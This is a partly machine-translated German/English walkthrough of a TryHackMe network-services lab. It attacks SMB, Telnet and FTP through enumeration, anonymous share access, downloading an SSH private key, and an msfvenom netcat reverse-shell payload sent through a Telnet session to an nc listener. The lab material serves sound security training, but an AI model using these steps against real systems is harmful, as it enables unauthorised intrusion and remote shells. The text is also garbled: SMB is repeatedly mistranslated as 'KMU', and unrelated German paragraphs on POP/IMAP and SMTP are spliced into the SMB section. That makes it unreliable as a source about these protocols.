We covered the SMB protocol and how it works. SMB is is a client-server communication protocol used for sharing access to files, printers, serial ports and other resources on a network. We also covered enumeration and vulnerability analysis of SMB. This was part of TryHackMe Network Services Room

Holen Sie sich Blue Team Notes

KMU – Server Message Block Protocol – is a client-server communication protocol used for sharing access to files, printers, serial ports and other resources on a network. [source]

Servers make file systems and other resources (printers, named pipes, APIs) available to clients on the network. Client computers may have their own hard disks, but they also want access to the shared file systems and printers on the servers.

Der KMU protocol is known as a response-request protocol, meaning that it transmits multiple messages between the client and server to establish a connection. Clients connect to servers using TCP/IP (actually NetBIOS over TCP/IP as specified in RFC1001 and RFC1002), NetBEUI or IPX/SPX.

Once they have established a connection, clients can then send commands (SMBs) to the server that allow them to access shares, open files, read and write files, and generally do all the sort of things that you want to do with a file system. However, in the case of SMB, these things are done over the network.

POP und IMAP

POP oder „Post Office Protocol“ und IMAP, „Internet Message Access Protocol“ sind beides E-Mail-Protokolle, die für die Übertragung von E-Mails zwischen einem Client und einem Mailserver verantwortlich sind. Der Hauptunterschied besteht im einfacheren Ansatz von POP, bei dem der Posteingang vom Mailserver auf den Client heruntergeladen wird. IMAP hingegen synchronisiert den aktuellen Posteingang mit neuen E-Mails auf dem Server und lädt alles Neue herunter. Das bedeutet, dass Änderungen am Posteingang, die auf einem Computer über IMAP vorgenommen wurden, bestehen bleiben, wenn Sie den Posteingang anschließend von einem anderen Computer aus synchronisieren. Der POP/IMAP-Server ist für die Durchführung dieses Vorgangs verantwortlich.

Wie funktioniert SMTP arbeiten?

Die Zustellung von E-Mails funktioniert ähnlich wie die Zustellung physischer Post. Der Benutzer stellt die E-Mail (einen Brief) und einen Dienst (den Postzustellungsdienst) bereit und liefert sie in einer Reihe von Schritten in den Posteingang (Briefkasten) des Empfängers. Die Rolle des SMTP Der Server hat bei diesem Dienst die Funktion einer Sortierstelle, die E-Mail (Brief) wird abgeholt und an diesen Server gesendet, der sie dann an den Empfänger weiterleitet.

SMB Enumeration

Aufzählung

Enumeration is the process of gathering information on a target in order to find potential attack vectors and aid in exploitation.

This process is essential for an attack to be successful, as wasting time with exploits that either don’t work or can crash the system can be a waste of energy. Enumeration can be used to gather usernames, passwords, network information, hostnames, application data, services, or any other information that may be valuable to an attacker.

KMU

Typically, there are KMU share drives on a server that can be connected to and used to view or transfer files. SMB can often be a great starting point for an attacker looking to discover sensitive information — you’d be surprised what is sometimes included on these shares.

 

Port Scanning

The first step of enumeration is to conduct a port scan, to find out as much information as you can about the services, applications, structure and operating system of the target machine.

If you haven’t already looked at port scanning, I recommend checking out the Nmap Zimmer Hier.

Enum4Linux

Enum4linux is a tool used to enumerate KMU shares on both Windows and Linux systems. It is basically a wrapper around the tools in the Samba package and makes it easy to quickly extract information from the target pertaining to SMB. It’s installed by default on Parrot and Kali, however if you need to install it, you can do so from the official github.

The syntax of Enum4Linux is nice and simple: “enum4linux [options] ip”

TAG            FUNCTION

-U             get userlist
-M             get machine list
-N             get namelist dump (different from -U and-M)
-S             get sharelist
-P             get password policy information
-G             get group and member list

-a             all of the above (full basic enumeration)

Raumantworten

Was macht KMU stehen für?

What type of protocol is SMB?

What do clients connect to servers using?

What systems does Samba run on?

Conduct an nmap scan of your choosing, How many ports are open?

What ports is KMU weiterlaufen?

Let’s get started with Enum4Linux, conduct a full basic enumeration. For starters, what is the workgroup name?

What comes up as the Name of the machine?

What operating system version is running?

What share sticks out as something we might want to investigate?

What would be the correct syntax to access an SMB share called “secret” as user “suit” on a machine with the IP 10.10.10.2 on the default port?
Great! Now you’ve got a hang of the syntax, let’s have a go at trying to exploit this vulnerability. You have a list of users, the name of the share (smb) and a suspected vulnerability.

Lets see if our interesting share has been configured to allow anonymous access, I.E it doesn’t require authentication to view the files. We can do this easily by:

– using the username “Anonymous”

– connecting to the share we found during the enumeration stage

– and not supplying a password.

Does the share allow anonymous access? Y/N?

Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?

What service has been configured to allow him to work from home?

Okay! Now we know this, what directory on the share should we look in?

This directory contains authentication keys that allow a user to authenticate themselves on, and then access, a server. Which of these keys is most useful to us?

Download this file to your local machine, and change the permissions to “600” using “chmod 600 [file]”.

Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server.

What is the smb.txt flag?

What is Telnet?

What has slowly replaced Telnet?

How would you connect to a Telnet server with the IP 10.10.10.3 on port 23?
The lack of what, means that all Telnet communication is in plaintext?

Wie viele ports are open on the target machine?

Was port is this?

This port is unassigned, but still lists the protocol it’s using, what protocol is this?

Now re-run the nmap scan, without the -p- tag, how many ports show up as open?

Here, we see that by assigning telnet to a non-standard port, it is not part of the common ports list, or top 1000 ports, that nmap scans. It’s important to try every angle when enumerating, as the information you gather here will inform your exploitation stage.

Based on the title returned to us, what do we think this port could be used for?
Who could it belong to? Gathering possible usernames is an important step in enumeration.

Always keep a note of information you find during your enumeration stage, so you can refer back to it when you move on to try exploits.

Okay, let’s try and connect to this telnet port! If you get stuck, have a look at the syntax for connecting outlined above.

Great! It’s an open telnet connection! What welcome message do we receive?

Let’s try executing some commands, do we get a return on any input we enter into the telnet session? (Y/N)

Hmm… that’s strange. Let’s check to see if what we’re typing is being executed as a system command.

Start a tcpdump listener on your local machine.

If using your own machine with the OpenVPN connection, use:

  • sudo tcpdump ip proto \\icmp -i tun0

If using the AttackBox, use:

  • sudo tcpdump ip proto \\icmp -i ens5

This starts a tcpdump listener, specifically listening for ICMP traffic, which pings operate on.

Now, use the command “ping [local THM ip] -c 1″ through the telnet session to see if we’re able to execute system commands. Do we receive any pings? Note, you need to preface this with .RUN (Y/N)

Great! This means that we are able to execute system commands AND that we are able to reach our local machine. Now let’s have some fun!

We’re going to generate a reverse shell payload using msfvenom.This will generate and encode a netcat reverse shell for us. Here’s our syntax:

“msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R”
 
-p = payload
lhost = our local host IP address (this is dein machine’s IP address)
lport = the port to listen on (this is the port on dein machine)
R = export the payload in raw format
What word does the generated payload start with?

Perfect. We’re nearly there. Now all we need to do is start a netcat listener on our local machine. We do this using:

“nc -lvp [listening port]”

What would the command look like for the listening port we selected in our payload?

Great! Now that’s running, we need to copy and paste our msfvenom payload into the telnet session and run it as a command. Hopefully- this will give us a shell on the target machine!

Success! What is the contents of flag.txt?

What communications model does FTP use?

What’s the standard FTP Hafen?

How many modes of FTP connection are there?

Run an nmap scan of your choice.

Wie viele ports are open on the target machine?

Was port is ftp running on?

Was variant of FTP is running on it?

Great, now we know what type of FTP server we’re dealing with we can check to see if we are able to login anonymously to the FTP server. We can do this using by typing “ftp [IP]” into the console, and entering “anonymous”, and no password when prompted.

What is the name of the file in the anonymous FTP Verzeichnis?

What do we think a possible username
could be?

Great! Now we’ve got details about the FTP server and, crucially, a possible username. Let’s see what we can do with that…

What is the password for the user “mike”?

Bingo! Now, let’s connect to the FTP server as this user using “ftp [IP]” and entering the credentials when prompted

What is ftp.txt?

Video-Komplettlösung

Über den Autor

Ich erstelle Notizen zur Cybersicherheit, Notizen zum digitalen Marketing und Online-Kurse. Ich biete auch Beratung zum digitalen Marketing an, einschließlich, aber nicht beschränkt auf SEO, Google- und Meta-Anzeigen und CRM-Verwaltung.

Artikel anzeigen